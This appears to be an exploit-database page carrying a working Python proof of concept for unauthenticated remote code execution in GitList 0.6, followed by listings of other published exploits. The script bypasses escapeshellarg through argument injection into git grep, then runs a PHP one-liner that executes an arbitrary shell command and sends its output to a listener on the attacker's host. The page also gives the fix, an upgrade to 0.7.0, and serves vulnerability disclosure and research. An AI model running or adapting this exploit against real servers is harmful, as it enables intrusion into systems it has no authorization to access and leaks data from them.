Menu

Search for hundreds of thousands of exploits

"GitList 0.6 - Remote Code Execution"

Author

Exploit author

"Kacper Szurek"

Platform

Exploit platform

php

Release date

Exploit published date

2018-04-26

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
'''
# Exploit Title: GitList 0.6 Unauthenticated RCE
# Date: 25-04-2018
# Software Link: https://github.com/klaussilveira/gitlist
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
  
1. Description
 
Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`.

More info about this technique:

https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
 
2. Proof of Concept
'''

import requests
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urlparse
import urllib
import threading
import time
import os
import re

url = 'http://192.168.1.1/gitlist/'
command = 'id'
your_ip = '192.168.1.100'
your_port = 8001

print "GitList 0.6 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"

print "REMEMBER TO DISABLE FIREWALL"

search_url = None
r = requests.get(url)
repos = re.findall(r'/([^/]+)/master/rss', r.text)

if len(repos) == 0:
	print "[-] No repos"
	os._exit(0)

for repo in repos:
	print "[+] Found repo {}".format(repo)
	r = requests.get("{}{}".format(url, repo))
	files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text)
	for file in files:
		r = requests.get("{}{}/raw/master/{}".format(url, repo, file))
		print "[+] Found file {}".format(file)
		print r.text[0:100]
		search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])		
		break

if not search_url:
	print "[-] No files in repo"
	os._exit(0)

print "[+] Search using {}".format(search_url)

class GetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = urlparse.urlparse(self.path)
        print "[+] Command response"
        print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]
        self.send_response(200)
        self.end_headers()
        self.wfile.write("OK")
        os._exit(0)

    def log_message(self, format, *args):
        return

def exploit_server():
	server = HTTPServer((your_ip, your_port), GetHandler)
	server.serve_forever()

print "[+] Start server on {}:{}".format(your_ip, your_port)
t = threading.Thread(target=exploit_server)
t.daemon = True
t.start()
print "[+] Server started"

r  = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)})

while True:
    time.sleep(1)

'''
3. Solution:

Update to version 0.7.0

https://github.com/klaussilveira/gitlist/releases/tag/0.7.0
'''
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2018-07-18 "HomeMatic Zentrale CCU2 - Remote Code Execution" remote hardware "Kacper Szurek"
2018-07-04 "Gitea 1.4.0 - Remote Code Execution" webapps multiple "Kacper Szurek"
2018-07-04 "ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution" webapps java "Kacper Szurek"
2018-05-21 "GitBucket 4.23.1 - Remote Code Execution" webapps java "Kacper Szurek"
2018-04-26 "GitList 0.6 - Remote Code Execution" webapps php "Kacper Szurek"
2018-01-18 "GitStack 2.3.10 - Remote Code Execution" webapps php "Kacper Szurek"
2017-09-27 "NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution" webapps hardware "Kacper Szurek"
2017-08-08 "Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution" webapps hardware "Kacper Szurek"
2017-07-24 "ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)" webapps java "Kacper Szurek"
2017-05-10 "QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass" webapps php "Kacper Szurek"
2017-04-25 "Dell Customer Connect 1.3.28.0 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-03-06 "CyberGhost 6.0.4.2205 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-02-14 "ShadeYouVPN Client 2.0.1.11 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-02-06 "IVPN Client 2.6.1 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-31 "Viscosity 1.6.7 - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-24 "WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution" webapps hardware "Kacper Szurek"
2017-01-18 "SentryHD 02.01.12e - Local Privilege Escalation" local windows "Kacper Szurek"
2017-01-10 "WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation" webapps php "Kacper Szurek"
2016-12-06 "AbanteCart 1.2.7 - Cross-Site Scripting" webapps php "Kacper Szurek"
2016-11-29 "WinPower 4.9.0.4 - Local Privilege Escalation" local windows "Kacper Szurek"
2016-11-09 "e107 CMS 2.1.2 - Privilege Escalation" webapps php "Kacper Szurek"
2016-09-20 "Dolphin 7.3.0 - Error-Based SQL Injection" webapps php "Kacper Szurek"
2016-07-11 "Tiki Wiki CMS 15.0 - Arbitrary File Download" webapps php "Kacper Szurek"
2016-06-10 "phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting" webapps php "Kacper Szurek"
2016-06-06 "WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection" webapps php "Kacper Szurek"
2016-02-15 "Tiny Tiny RSS - Blind SQL Injection" webapps php "Kacper Szurek"
2015-12-30 "WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection" webapps php "Kacper Szurek"
2015-12-14 "WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation" webapps php "Kacper Szurek"
2015-11-11 "WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection" webapps php "Kacper Szurek"
2015-08-09 "WordPress Plugin Video Gallery 2.7 - SQL Injection" webapps php "Kacper Szurek" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected